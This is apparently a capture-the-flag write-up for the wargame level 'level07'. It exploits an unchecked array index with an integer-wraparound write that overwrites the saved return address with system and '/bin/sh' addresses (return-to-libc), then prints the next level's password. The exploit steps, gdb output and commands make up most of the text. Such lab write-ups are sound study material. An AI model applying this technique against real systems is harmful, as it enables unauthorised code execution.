In spite of array being size of 100, function store_number and read_number ignore it

./level07 
----------------------------------------------------
  Welcome to wil's crappy number storage service!   
----------------------------------------------------
 Commands:                                          
    store - store a number into the data storage    
    read  - read a number from the data storage     
    quit  - exit the program                        
----------------------------------------------------
   wil has reserved some storage :>                 
----------------------------------------------------

Input command: store
 Number: 21 
 Index: 512
 Completed store command successfully
Input command: store
 Number: 21
 Index: -42
 Completed store command successfully
Input command: read
 Index: 512
 Number at data[512] is 21
 Completed read command successfully
Input command: read
 Index: -42
 Number at data[4294967254] is 134514134
 Completed read command successfully

That means that system '/bin/sh' can be passed

0xf7e6aed0  system    = 4159090384
0xf7f897ec  '/bin/sh' = 4160264172

We need to find offset

(gdb) i f
Stack level 0, frame at 0xffffd530:
 eip = 0x80486d8 in read_number; saved eip 0x8048930
 called by frame at 0xffffd720
 Arglist at 0xffffd528, args: 
 Locals at 0xffffd528, Previous frame's sp is 0xffffd530
 Saved registers:
  ebp at 0xffffd528, eip at 0xffffd52c

  (gdb) where
#0  0x080486d8 in read_number ()
#1  0x08048930 in main ()

ffffd530 - ffffd528 = 0x8, 464 - 8 = 456, 456 bytes = 114th position in array

Unfortunatelly this position is reversed

 Index: 114
 *** ERROR! ***
   This index is reserved for wil!
 *** ERROR! ***
 Failed to do store command

Luckily array has unsigned type, so we can write 114 with overflow

0x1c8 + UINT_MAX + 0x1 = 4294967752

Dividing by 4, we get index 1073741938

Input command: store
 Number: 4159090384
 Index: 1073741938
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit
$ whoami
level08
$ cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
$ su level08
Password: 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX disabled   No PIE          No RPATH   No RUNPATH   /home/users/level08/level08